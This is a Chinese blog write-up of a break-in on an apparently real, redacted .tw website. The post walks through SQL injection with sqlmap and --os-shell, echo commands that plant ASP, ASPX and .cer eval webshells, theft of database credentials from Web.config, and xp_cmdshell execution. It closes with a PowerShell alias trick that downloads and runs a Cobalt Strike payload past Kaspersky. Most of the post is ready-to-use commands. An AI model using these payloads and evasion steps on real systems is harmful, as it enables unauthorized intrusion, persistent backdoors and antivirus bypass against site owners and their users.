0x1

单引号页面报错得到数据库sqlserver 且路径

d:\WebSites\xxxx

89965-1ik7nzcex8d.png

使用sqlmap去跑注入

sqlmap -u "http://xxxxxxxxx.tw/xxxxxx/xxxxxx.aspx?News=129588" --random-agent --skip-waf  --dbms mssql

31594-4v0n5n3fj9h.png

--os-shell执行命令

53907-awthrda1qbe.png

尝试echo写马,访问401然后404可能被杀软杀了

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["a"],"unsafe");%^> >>d:\WebSites\xxxx\x.aspx

尝试写asp,访问401

echo ^<%eval request("c")%^> >>d:\WebSites\xxxx\x.asp

最后通过写入cer成功连接一句话

echo ^<%eval request("c")%^> >>d:\WebSites\xxxx\x.cer

29195-e0n2snbrt1.png

发现无法执行命令
60998-bosxg6jda9.png

数据库能执行那么我们去找数据库配置文件,在D:/WebSites/xxxx/Web.config得到账号sitemaster密码xxxx
18174-b2tvmqbbyu.png

蚁剑连接数据库
61314-cfjhijwn4d9.png

利用数据库执行命令

use master;exec master..xp_cmdshell 'whoami';

28112-no7600ocg8e.png

执行命令tasklist /SVC通过比对发现系统存在卡巴基斯

15195-mv9sch02ny.png

这里bypass通过powershell上线

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('CSpowershell地址')

48318-plujcszfd8e.png

成功上线
72365-hf4shnrdrxs.png

最后修改:2022 年 01 月 22 日
  • 本文作者:Juneha
  • 本文链接:https://blog.mo60.cn/index.php/archives/88.html
  • 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
  • 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
如果觉得我的文章对你有用,请随意赞赏